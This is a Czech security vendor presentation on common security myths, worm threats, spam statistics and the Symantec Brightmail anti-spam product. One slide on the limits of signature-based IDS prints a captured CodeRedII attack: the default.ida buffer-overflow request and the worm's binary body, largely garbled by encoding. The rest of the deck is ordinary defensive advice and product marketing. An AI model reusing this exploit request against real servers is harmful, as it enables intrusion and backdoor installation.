Mýty a reality bezpečnosti Jaroslav Techl techl@abdist.cz ABAKUS Distribution, a.s.
Čeho jsme stále více svědky? Téměř všechny větší společnosti se ocitají bez perimetru Částečně se jedná o důsledky diverzifikace obchodních aktivit Masové užívání přenosných počítačů přináší zcela zásadní rizika Naprostá většina útoků je aplikačních a přichází povolenými porty Ze zvýšeného „virového šumu“ vyrůstají nebezpečné útoky, realizované pomocí replikujících se červů Nebezpečné kódy zneuživají zranitelností a hackují sítě zákazníků Jsou vykrádána citlivá data, která jsou odesílána neznámým příjemcům Téměř všechny „pokročilé“ červy byly spojeny s trojskou logikou Dochází k ochromujícím DDoS útokům ne zvenčí, ale zevnitř sítí Kompromitace zevnitř jsou stále více záměrem vnějších útočníků Analyze your main losses, reasons we failed, main obstacles and road blocks we must overcome. 2 –
Proč se to děje s takovým úspěchem? Příčinou nejsou jen úspěšní útočníci, ale také neúspěšní obránci, podléhající řadě bezpečnostních mýtů. 3 –
1. mýtus – „Technologie rozhoduje“ Rozhodují lidé! Zranitelný software tady bude a výrobce to nevyřeší. Útočníci tady také budou a budou kompetentní. Zvyšujte tedy svoji kompetenci rychleji. Základem je znát, ne domnívat se! Myslet, znamená nevědět. Naprosté většině úspěšných útoků předcházejí nezpozorovaná nebo ignorovaná varování Přes pokles tempa vzniku nových zranitelností zůstává stále frekvence na úrovni 73/týden (statistika CERT za rok 2003) Očekávat, že tuto záplavu zvládnou provozně orientovaní správci bez nástrojů je zcela iluzorní a nerealistické Většina útoků nevyžaduje žádnou nebo jen minimální interakci s uživatelem. Ten jim nezabrání. Proti profesionálovi musí stát profesionál. 4 –
Realita – inkubační doba zranitelností 5 –
2. mýtus – „Vždyť jsou to jen viry!“ Nejčastěji Vás ohrožují replikující se „kódy – hackeři“ Napadení typicky přichází po vně povolených portech nebo zevnitř sítě Jsou atakovány zranitelnosti a standardně otevřené porty nechráněných služeb Vlastní smtp enginy v těle kódu vedou k anonymnímu vykrádání informací Souběh skanů a nelegálních smtp transakcí zapříčiňuje DDoS útok zevnitř Koncový uživatel je čistou obětí, nikoliv „spolupachatelem“ škod Drtivá většina těchto kódů v sobě obsahuje nebo umožňuje trojskou logiku Samotné antiviry (bez ohledu na výrobce) často nemohou útoku účinně zabránit 6 –
Realita – kombinované hrozby 7 –
Rozsah napadených platforem Compaq OpenVMS Compaq True64 Unix Cray UNICOS Entegrity DCE/DCF for Linux, True 64 Unix Entegrity PC-DCE for Windows HP Advanced Security for VP HP-UX, Solaris HP-UX 10.2-11.0 HP OpenView Operations, VP Manager IBM DCE Windows, AIX, Solaris MS Windows 2000 Advanced Server, Data Center, Professional MS Windows XP Home, Professional 8 –
Blaster: Co to bylo? Červ, který se chová jako naprogramovaný hacker Spustitelný kód je tajně umístěn do počítače Dorazí jako deformovaná zpráva přes port 135 (DCOM RPC) Důvody jeho úspěšnosti Využití známé zranitelnosti Microsoft RPC. Shodí službu a vloží deformovanou zprávu do systému Port 135 je v interních sítích typicky ponecháván otevřený, výsledkem je interní DDoS Port 135 je používán pro Win management, i v případě osobních firewallů bude často přístupný Infikovaný stroj se restartuje předtím, než může být zaveden patch Vzniká plných 27 dní před vyrobením patche 9 –
3 .mýtus – „Jsme přece za firewallem“ Jste si jisti slůvkem „za“? Značná část vlastních uživatelů pracuje velmi frekventovaně mimo perimetr Mobilní pracovníci s notebooky, palmy apod. Absence osobních firewallů (zejména kvůli slabinám v administraci) Korporativní firewally stojí pouze na připojeních k Internetu Povolené porty a služby, které jsou vynuceny obchodními činnostmi Značnou část externích subjektů pouštíme velmi frekventovaně za perimetr Obchodní partneři, zákazníci, dodavatelé, veřejnost Servisní pracovníci, vývojáři, testovací práce, pilotní projekty Outsourcing a diverzifikace činností uvnitř korporací Proč tedy mnoho těchto útoků přes Váš firewall prošlo? Část jich propouštíte podle vlastních pravidel (až 80% útoků je aplikačních) IDS systémy nejsou nasazovány tak, aby prohloubily perimetr směrem dovnitř To, že se útoky za firewallem projevily, neznamená, že skrze něj přišly 10 –
Realita – nejčastěji skanované porty 11 –
4. mýtus – „IDS – to je, co frčí!“ Co je to síťové IDS založené na signaturách útoků? Signaturové IDS je svým mechanismem de facto blízké „packetovému antiviru“ Vysoká aktualizační zátěž (není signatura, není detekce) Existuje asi 3000 známých útoků vs. současné IDS jsou schopny uplatnit 600 signatur Nulová účinnost v nulových dnech vs. simulace účinnosti honbou za známými útoky Vysoký počet falešných hlášení a snadná možnost zneužití zvenčí Proč mají výrobci síťových IDS tak malou instalovanou bázi? Každé reálně nasazené IDS zakládá problém typu „24x7x365“ Minimální podpora agregací a korelací útoků vs. statisíce izolovaných událostí Vysoká pracnost odlišení falešných hlášení od skutečných síťových útoků Finální rozčarování pak vede k tomu, že mnohé systémy končí opět v krabici na skříni Detekce anomálií v protokolech a provozu, využívající signatur jen doplňkově Použití výkonných agregačních a korelačních enginů – incidenty 12 –
Realita – omezení signaturových systémů GET default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xmlContent-length: 3379 ネネ� `・ フ・dg6 dg・ 鞜� h��劫\PU恪・PU・@�・燕XU・�� �斑=�� �版ヘ�カノ燕T丘�×0・ �・ ヌF0・ ・ CodeRedII ・$U、Yj�劫pPuUーサ� タtK3ロU・3' u?ヌ・ ヌ・ ヌ・� 畿怨d劫hPj 劫`Pj j�U屠 Th~f�uU、Y・�u1 X-モ� j h・ P uUャ=・ u�j j�劫\PuUィuUエ鱸サ ゚w・ � ・ xu�サ `・ 掬$�dg・ Xa・dg6 dg・ f・MZu繼K<・PE uラ亀x�モ毅�・�KERNuナ-��EL32u サ3ノI脚 �Aュ・�GetPu|��rocAu・J�Iム・J$�キ�チ・�J�・�テ吋$$dg・ Xaテ鏖云・E LoadLibraryA u・UE CreateThread u・UE GetTickCount u・UE・� Sleep u・UE韋� GetSystemDefaultLangID u・UE蒻� GetSystemDirectoryA u・UE琲 CopyFileA u・UEワ・ GlobalFindAtomA u・UEリ・ GlobalAddAtomA u・UEヤ・ CloseHandle u・UEミ・ _lcreat u・UEフ・ _lwrite u・UEネ・ _lclose u・UEト・ GetSyste mTime u・UEタ・ WS2_32.DLL UEシ・ socket uシUEク・ closesocket uシUEエ・ ioctlsocket uシUE、・ connect uシUEー・ select uシUE・ send uシUEャ・ recv uシUEィ・ gethostname uシUE懆� gethostbyname uシUE倩� WSAGetLastError uシU碑 USER32.DLL UE占� ExitWindowsEx u・UE古畿・タ�・�@右ы・xV4�チタ�テ鞦< t・t竟旗韆韓チ・鞋旗靱韓雍・�・ Y・・リ#・リ・t麾鍗t・拗t津h�� 劫\PU熏シ�\・ \CMD.EXE ^・・、ウcj�・ d:\inetpub\scripts\root.exe ・$・劫\PUワj�・d:\progra~1\common~1\system\MSADC\root.exe ・$・劫\PUワ霄� ・ZP � � � ク @ � �・・・ PE L�� *%) 潤��� � � � � @ � � � � @ � � � � � � 0 ��・ � � � � ` � � � @ タ � 0 � � @ タ・・・・・・・・・・・・・・・・・・・・・・ h�� hミ @ 鐶� 査ミ @ セ @ ・・・・j�hミ @ 鎰� ・ hタ‘ ・� ・hリ$@ h? � j h� @ h� ・� タu&j�hT @ j�j hH @ 5リ$@ ・� 5リ$@ ・� hリ$@ h? � j hX @ h� 竟 タuUス・@ 鎰 スィ @ 錚 j hク @ j�j hー @ 5リ$@ 雍 j hト @ j�j hエ @ 5リ$@ 陌 5リ$@ 陏 テヌ�ミ$@ � hミ$@ hミ @ hヤ$@ j U5リ$@ 鐐 タuI。ミ$@タt@セミ @ > t6Ff×,,u�217 ・フ @ ・ミ$@ 5ミ$@ hミ @ j�j U5リ$@ ・ テ%`0@ %d0@ %h0@ %p0@ %t0@ %x0@ %|0@・・・・・・・・・ \EXPLORER.EXE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable ・SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts /MSADC /C /D c:\,,217 d:\,,217・・・・・・・・・・・・ <0 ・ `0 L0 ・ p0 ・ ヲ0 セ0 ネ0 ワ0 ・ 0 ・ ヲ0 セ0 ネ0 ワ0 ・ 0 KERNEL32.dll ADVAPI32.dll Sleep GetWindowsDirectoryA WinExec RegQueryValueExA RegSetValueExA RegOpenKeyExARegCloseKey・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・ ^ソケ� j�・ d:\explorer.exe ・$・Uフ・tM怨Lャ旗8>u'j ・j�VオLUネFOuナオLUトテ珒�・・テaノツ� 13 –
5. mýtus – „Více výrobců = více jistoty!“ Ani kombinace technologií různých výrobců nemusí být všelékem Kombinace různých produktů od různých výrobců má své kouzlo (například v případě heuristické kontroly antivirů) Přináší však řadu úskalí – různá správa, rozdílná aktualizace, občasné konflikty na stejných systémech Mezníkem je často velikost společnosti – važte proti sobě výhodu různosti a problém neovladatelnosti Náklady na integraci často překračují náklady na produkty Základním problémem integrace není to, „aby si produkty navzájem rozuměli“ Jde o to, aby lidé rozuměli tomu, „co se ve všech těch produktech současně děje“ Účinnost je založena na informaci, na jejímž základě se rozhodnu a správně konám Často neplatí, že kombinace „toho nejlepšího“ dává něco „ještě lepšího“ 14 –
Realita – Jak pejsek s kočičkou vařili dort 15 –
6. mýtus – „Hacker je technický genius“ Sociální techniky jsou stále velmi účinné a měli by být prověřovány Technické zranitelnosti svých systémů můžete relativně snadno zjišťovat, už jste někdy zavolali koncovému uživateli Základní školení bezpečnostních praktik by nemělo být dlouhodobě obcházeno (Enterprise Security Awareness Program) I nízká kvalifikace může stačit při velké důvěře nebo neomezené příležitosti Sociálně založený hacking přichází často i zevnitř (rozdílná motivace) James Bond na střeše nepřistane, stále je jednodušší dát někomu peníze Snažte se personálními opatřeními snížit fluktuaci klíčových pracovníků Fluktuace se typicky týká shodných nebo podobných oborů – Vaši lidé přijdou ke konkurenci Omezujte obtížně kontrolovatelné technologie (plošné přístupy přes ODBC, klíčová data ve sdílených adresářích...) 16 –
7. mýtus – „Všichni si rozumíme“ Sociální techniky jsou stále velmi účinné a měli by být prověřovány V čem spočívá podstata lidské komunikace a v čem je její problém? Strana, která „kóduje“ používá jiný klíč, než strana, která „dekóduje“ Různá úroveň znalostí a kvalifikace Různé zkušenosti a představy o sdíleném obsahu Mnoho scénářů úspěšných útoků počítá s tímto faktem !!! Než se lidé dohodnou, často již není na čem se dohadovat Fingované útoky proti IDS odvádějící pozornost bezpečnostních specialistů Kombinované útoky různůmi červy ve stejném čase nebo v těsné souslednosti Různé projevy téhož na různých úrovních Jak to vidíme „my od firewallu“ Helpdesk už má zase problémy s aplikací Správce něco udělal s přístupy... 17 –
Hlavní zásady účinné bezpečnosti Příčinou nejsou jen úspěšní útočníci, ale také neúspěšní obránci I bezpečnostní specialisté často redukují bezpečnost na technologii Zásadně je podceňována hodnota přesných informací a včasných varování Naprostá většina společnostní používá pouze kombinaci firewall/antivirus Převážná většina firewallů nepracuje na aplikační vrstvě a není schopna rekonstruovat pakety na vnitřních rozhraních Základním problémem jsou lidé, jejich informovanost, komunikace, rozhodnutí a akce Ze zvýšeného „virového šumu“ vyrůstají nebezpečné útoky, realizované pomocí replikujících se červů Nebezpečné kódy zneuživají zranitelností a hackují sítě zákazníků Jsou vykrádána citlivá data, která jsou odesílána neznámým příjemcům Téměř všechny „pokročilé“ červy byly spojeny s trojskou logikou Dochází k ochromujícím DDoS útokům ne zvenčí, ale zevnitř sítí Investujte do zhodnocení dat, která již máte a do schopnosti řídit odezvu 18 –
Realita v České republice včera Antivirové záznamy celkem Antivirové záznamy HTTP/FTP Provoz na perimetru Útoky podle typu ne jen AV 19 –
Stav spamu – v průměru 66% jsme naměřili v ČR Průměrné stavy po měsících: Listopad 2004 52% Prosinec 2004 71% Leden 2005 82% Z toho bylo zamořeno červy: Listopad 2004 7% z celkového objemu (tj. 3928 zpráv) Prosinec 2004 3% z celkového objemu (tj. 1981 zpráv) Leden 2005 1% z celkového objemu (tj. 8 zpráv) (Výsledek za leden je zkreslen tím, že jsme testovali účinnost firewallů před antispamovou bránou.) 20 –
Údaje spamové sondy po měsících 21 –
Podrobnější pohled po týdnech 22 –
Virová zátěž ve spamu po měsících 23 –
Viry a červy ve spamu po týdnech 24 –
Architektura a nasazení řešení Symantec
Základní pohled na architekturu Na straně Symantec U zákazníka Až 25% pošty v Internetu! Aktualizace od 10 minut 26 –
Architektura Symantec Brightmail Anti-Spam 6.x u zákazníka 27 –
Analýza SPAMu: centra BLOC 28 –
Analýza SPAMu: zkušební síť Základní funkce Jak to pracuje Proč je to unikátní Shromažďuje obrovská množství pošty pro spam analýzu Poskytuje varování přes spam útoky a jinými hrozbami v reálném čase Doručuje spam a falšovanou poštu do center BLOC, kde je analyzována a zpracována Agreguje statistiky o celkovém poštovním provozu, dovoluje měřit úrovně spamování Zákazníci vytvářejí nové adresy, které směrují poštu do center Symantec/Brightmail Adresy jsou navrhovány tak, aby přitahovaly spammery a jsou široce publikovány Patentová ochrana: Symantec je držitelem unikátního patenru na spam honey-pot Globální pokrytí: Zahrnuje adresy od ISP a velkých korporací v Americe, regionu EMEA a APAC Mimořádný rozsah: Přes 2 miliony klamných mailových adres a domén. Spolu se vzorky spamové pošty od zákazníků kontrolujeme přes 300 milionů poštovních adres 29 –
Způsoby a metody filtrování
Obrana proti Spamu: víceúrovňový přístup 31 –
Fitrování dle identity a reputaci Co to je Výhody Výzvy Identita: Určení domény, IP adresy nebo poštovní adresy odesílatele příchozí zprávy Reputace: Monitoring chování odesílatele a zdroje pošty s cílem určit poměr mezi legitimní poštou a spamem posílaným z daných adres Spolehlivost: Každý počítač v Internetu má unikátní IP adresu Obtížné oklamání: I když spammeři mohou snadno podvrhnout adresu odesílatele (help@citibank.com), nemohou snadno maskovat IP adresu odesílajícího stroje Problém otevřených relayí: Spammeři mohou používat otevřené relaye, které jsou vlastnictvím odesílatelů legitimní pošty Kvalita: Seznamy musí být extrémně přesné a často aktualizované, aby se mohly vypořádat se spammery 32 –
Co se děje na pozadí reputací? 33 –
Služba reputací: první linie obrany Jak to pracuje Reputation Service Dostupné seznamy Symantec trvale analyzuje reputaci IP adres, které odesílají poštu Symantec/Brightmail Scanner se rozhoduje buď v úplné nebo částečné závislosti na reputaci IP adresy odesílatele Služba plně integrována do Symantec /Brightmail Anti-Spam Seznam otevřených proxy: zahrnuje stroje infikované nebezpečným kódem Seznam podezřelých: včetně strojů, jejichž pošta je vysoce spammová Seznam bezpečných: zahrnuje stroje, které neodesílaly spam 34 –
Filtrování podle reputace: výhoda pro zákazníka Přesnost Automatizace Flexibilita a rychlost Patentovaná testovací síť proaktivně odhaluje otevřené proxy Ignoruje otevřené relaye, snižuje pravděpodobnost falešných detekcí Filtruje individuální servery, ne farmy Každou hodinu je vytvářen kompletně nový seznam Centra BLOC automaticky verifikují, zda jsou IP adresy otevřenými proxy Nové seznamy jsou každou hodinu automaticky znovu aktualizovány Nasazení je možné kdykoliv (restrikce nejsou omezeny pouze na poštovní gatewaye) Jediné řešení s aktualizovanými filtry na bázi reputace Nesrovnatelně vyšší přesnost a 2x vyšší výkonnost oproti standardním DNS lookup metodám 35 –
URL odkazy ve spamových zprávách Hrozba Odezva Spammeři ve zvýšené míře užívají URL odkazy v poště 90% spamové pošty obsahuje URL odkaz, který může uživatel použít Proč? Spam URL Filtry BLOC extrahuje v testovací síti URL od spamu BLOC vytváří seznam URL od spammerů URL odkazy jsou testovány, aby se zjistilo, zda je za nimi webový server spammerů URL odkazy jsou stahovány do scannerů na straně zákazníka E-mail se spam URL je blokován More and more spam features legitimate content designed to lead users not to the site advertised but a spammer’s website. Spammeři vydělávají velké peníze generováním webového provozu nebo vybízením uživatelů k nákupům 36 –
Spam URL Filtry: výhoda pro zákazníka Trvalá aktualizace Flexibilita a rychlost Účinnost Práce v reálném čase s dynamickými daty z testovací sítě – žádné „zatuchlé“ seznamy s filtry Přes 20.000 aktivních URL odkazů v seznamu Nové URL filtry jsou nasazovány každou hodinu Detekce falšovaných URL odkazů Rychlá kontrola shody u jednoduchých URL Pokročilá, heuristická analýza URL shody Zvláště efektivní proti URL odkazům typu „mailto:“ Jen samotný spam URL filtr zachycuje přes 70% spamové pošty Vysoce účinné proti širokému rozsahu spamových zpráv 37 –
Technologie antispamových signatur Hash na zprávě BrightSig2 Signatury příloh První generace technologie signatur MD5 hash na těle zprávy Zachycuje všechny identické zprávy, mající shodný MD5 hash Patentované signatury pro zachycení “nejasných” shodností s tělem zprávy Identifikují mutace a náhodná generování používaná spammery k obejití filtrů Zachycují specifické útoky (a jejich variace) přímo ve fázi jejich rozvoje Třetí generace technologie signatur Extrahuje přesné signatury MIME obsahu (např. pornografické obrázky, klamnou grafiku nebo i červy) Filtruje spam přílohy, současně povoluje průchod legitimním přílohám 38 –
Signatury příloh: poslední generace The latest generation of signature technology The problem: Spam is moving beyond HTML and URL Multiple MIME parts used in messages Worm attacks make common use of these Attachment Signatures: Create filters based on MIME type (Image, audio, video, ASCII, executables etc.) Yet another dimension on which to thwart attacks Potential to block worm outbreaks 39 –
Taktika spammerů: obejití filtrů falšováním HTML kódu Jednoduchý způsob, kterým může spammer zařídit náhodné generování obsahu zpráv Zprávy s HTML mutacemi jsou velmi obtížně zachytitelné filtry 40 –
BrightSig2: Boj proti mutovaným spamům Předem blokuje náhodně generované zprávy, které jsou mutacemi původního spam útoku 41 –
Heuristické filtrování Hledá víceré vlastnosti spamu Každá vlastnost „získává“ určitý počet bodů Body se postupně sčítají Je-li dosaženo SPAM skóre, je zpráva blokována Výhody Dobré pro boj se zcela novými spam záplavami Nevýhody Detekce může být delší Spammeři zprávy často testují proti některým heuristickým enginům ještě předtím, než záplavu spustí Heuristiky musí být „trénovány“, aby zachytily spam (často za cenu zvýšení počtu falešně blokovaných zpráv) Is this new? Brightmail has had heuristics in the BLOC for a long time. The header rules have had heuristics capability on the headers of the message. This new module allows heuristics across the entire message body and represents a significant upgrade to our heuristics capability. Training – Brightmail trains using our probe network – the largest, most complete (global, enterprise and ISP) spam collection. Brightmail uses a legit stream of commercial mail and person to person mail. Developed – The Heuristics technology was partially developed internally and partially by utilizing 3rd party technology. The 3rd party technology is SpamAssassin. 42 –
Heuristické filtrování: přednosti Symantecu Z podstaty věci samé je většina heuristik konkurentů kompromisem mezi účinností, přesností a výkonností Přesnost a rychlost Žádné „trénování“ Heuristika není naší primární antispamovou technologií, ale je pouze doplňkem Je použita až při neúčinnosti všech jiných filtrů Je proto navržena pro 5-10% celkové účinnosti systému Používá kompilovaný kód, který je 2-4x rychlejší než kód interpretovaný Heuristika je automaticky trénována centry BLOC na straně Symantecu, a to s využitím testovací sítě a legitimní pošty Administrativní zátěž je dále snižována pomocí automatické aktualizace Is this new? Brightmail has had heuristics in the BLOC for a long time. The header rules have had heuristics capability on the headers of the message. This new module allows heuristics across the entire message body and represents a significant upgrade to our heuristics capability. Training – Brightmail trains using our probe network – the largest, most complete (global, enterprise and ISP) spam collection. Brightmail uses a legit stream of commercial mail and person to person mail. Developed – The Heuristics technology was partially developed internally and partially by utilizing 3rd party technology. The 3rd party technology is SpamAssassin. 43 –
Filtrování na bázi jazyka Okolo 10% spamové pošty je v jiném než anglickém jazyku Symantec umí zákazníka chránit před ne-anglickým spamem Technologie filtrování Expertíza / zdroje Jazykově agnostická – technologie filtrování Jazykově specifická – heuristika Zeměpisně založené – filtrování reputace Language ID pro velkou skupinu jazyků Filtrování jazyka “per user“ Globální pokrytí BLOC US EMEA APAC Jazykové schopnosti analytiků BLOC (plynně hovoří většinou světově používaných jazyků – dokonce i česky a slovensky) 44 –
Příklad: Filtrování a identifikace jazyka „per-user“ 45 –
Nebezpečný obsah: další velká hrozba Antivirová detekce na bázi Symantec Scan Engine Detekuje viry a červy ve zprávách a jejich přílohách Červy jsou ze zpráv automaticky vymazávány Antivirové definice jsou aktualizovány společně s antispamovými pravidly K dispozici je oddělené i dodatečné licencování Who is the anti-virus technology from? It is from Symantec. We use the same technology that they use in other parts of their product. 46 –
Zákaznické filtry: silný doplněk Umožňují správcům, aby filtrovaly jiné, než spamové zprávy Vytvoření gobálních, na serverech založených filtrů pomocí editoru Custom Filters Víceré podmínky a skanovací kritéria: IP Addresy Odesílatel, příjemce, From, To, CC Pole záhlaví Tělo Velikost MIME záhlaví Volitelné akce se zprávami 47 –
Minimální zátěž správců
Symantec/Brightmail Control Center Webové rozhraní pro: Centralizovanou správu Tlačná nastavení Získávání logů Webová karanténa Rozhraní admina Rozhraní uživatele Monitoring Summární přehled Stav „per- machine“ Logy Statistiky a reporty 49 –
Globální správa a okamžitý celkový přehled Centralizovaná správa vícenásobných serverů Statistiky logů za jednotlivé nebo agregované skanery Konsolidované reporty za všechny skanery 50 –
Jednoduché nastavení přes Control Center Vložený Tomcat Vložené MySQL Vlastní software Webové stránky SMTP Listener Revize a vymazání Upozornění Kompletní řešení Seznam blokovaných uživatelů Seznamu povolených adres Skórování účinnosti obsahových filtrů Aktivace filtrování podle reputací Aktivace kontroly jazky Antivirová kontrola Vytvoření obsahových filtrů zákazníka Skupinové politiky Nastavení privilegií administrátorů Konsolidované reporty Konsolidované pohledy na individuální logy Varování před událostmi Změna LDAP nastavení Nastavení a přístup ke karanténě Migrace nastavení předchozích verzí Identifikace externích mail serverů Nastavení Brightmail skanerů 51 –
Skórování spamu Každá spam zpráva ma skóre Zprávy přes 90 dostávají verdikt spam Administrátor může měnit a ladit skórování spamu Administrátor může definovat „spodní hranici“ skóre pro podezřelé zprávy Akce a nastavení jsou definována v rámci skupinových politik 52 –
Detailní Reporting Za víceré kategorie zpráv Jako jsou: zpracované, spamové, podezřelé, povolené, blokované, virové atd. Reporting podle vícerých kritérií Příjemce Odesílatel Doména příjemce Doména odesílatele IP připojení atd. Výhody 19 předem připravených zpráv Prohlížeč zpráv v Control Center Ad hoc generování nebo nastavené intervaly Export do vícerých formátů Vytvoř seznam „Top 10“: - nejspamovanější zaměstnanci - nejspamovanější domény - IP připojení spammerů a další... 53 –
Skupinové politiky: k čemu jsou dobré? 54 –
Skupinové politiky: rozsah Různí členové skupin 6 kategorií pošty 6 typů verdiktu Všechny poštovní domény Sub domény Individuální uživatelé Podpora výběru typu „wildcart“ Spam Podezření na Spam Blokovaný odesílatel Povolený odesílatel Virus Červ Vymazání Označení těla zprávy Označení záhlaví zprávy Forward na poštovní adresu Uložení na disk Normální doručení 55 –
Control Center – bezpečnost správy Komunikace HTTPS mezi skanery a Control Center HTTPS mezi správci, koncovými uživateli a Control Center (volitelné) Privilegia administrátorů Podpora vícerých typů privilegií Různá privilegia pro různé administrátory (někteří pouze přistupují ke karanténě, jiní mohou měnit nastavení serverů...) Autentikace koncového uživatele přes LDAP do: Active Directory Exchange SunOne 56 –
LDAP: schopnosti a výhody Expanze poštovních aliasů Karanténa dělá automatický resolving všech aliasů a doručuje zprávy na karanténní účty tak, jak přísluší výchozím poštovním adresám Karanténa může přistupovat k LDAP adresářům, jako jsou: Active Directory (Exchange 2000 a Exchange 2003) Exchange 5.5 Sun ONE Directory Server Přizpůsobitelné atributy LDAP: Nastavení dotazů do LDAP je plně přizpůsobitelné. Atributy dotazů lze kombinovat tak, aby byly ve shodě se schématem Vašeho LDAP adresáře. 57 –
Systémová varování Okamžitá upozornění při výskytu určitých provozních podmínek Zasílá varovné maily správcům nebo jiným pracovníkům Aplikovatelné podmínky: Některá z komponent neodpovídá nebo nepracuje Antispamové filtry jsou starší, než je definovaný časový úsek pro aktualizaci Antivirové definice jsou starší, než je definovaný časový úsek pro aktualizaci Karanténa má málo diskového prostoru 58 –
Rozšířené webové rozhraní karantény Výhody Spam je na vstupu centrálně ukládán a vůbec neprochází sítí Koncoví uživatelé jsou o spamu denně nebo týdně informováni Centralizované vymazávání spamu po uplynutí počtu X dnů Možnost “uvolnit” karanténované zprávy do inboxu uživatelů Uživatelé mají trvalý přístup ke karanténě Uživatelé i administrátoři mají k dispozici prohledávání 59 –
Ukázka karantény 60 –
Na co si dát pozor u antispamu?
Kritérium 1: Přesnost a správnost Jenom zachytit spam samo o sobě nestačí Zachycení spamu a přesnost antispamu – obojí musí být hodnoceno současně Přesnost je často důležitější než účinnost (blokování legálních zpráv je nejčastějším důvodem krachu antispamových projektů) Mezi dodavateli jsou právě v oblasti přesnosti největší rozdíly !!! Blokování legálních zpráv vytváří stejně velký problém jako spam Uživatelé nejsou schopni dohledat poštu a bojují proti antispamu Správci pošty, případně helpdesk řeší laviny eskalací Dochází k obchodním ztrátám kvůli výpadku v doručování Ptejte se na: míru přesnosti! 62 –
Kritérum 2: Skutečná účinnost Vícenásobné technologie zaručí kompletní ochranu před spamem Žádná anti-spamová technologie není „kouzelným tlačítkem“ Různé filtry jsou efektivní proti různým typům spamu Spammer musí překonat každý filtr víceúrovňového řešení Inovace a globální pokrytí Potřeba konstatní inovace je definována tím, že antispam musí být stále o krok před spammery Schopnost účinně filtrovat ne-anglické jezyky, včetně nativní podpory českého jazyka Ptejte se na: měřitelnou účinnost ! 63 –
Kritérium 3: Administrativní zátěž Správce pošty a antispamu už nejsou “paní na hlídání” Automatické aktualizace filtrů Není nutné žádné ladění a „učení“ heuristiky Nainstaluj a běž – dělat něco jiného Symantec vytváří filtry v režimu 24x7x365 Automatické řešení falešných blokací Vysoké nároky na správu představují největší část „neviditelných“ nákladů na antispamová řešení What about the size of the rule set Roughly 12 megabytes Turns over every 2-3 days 4 megabytes every day is about 26 seconds of download on a T-1 Ptejte se na: Minimální administraci ! 64 –
Proto jsme tady !!! 65 –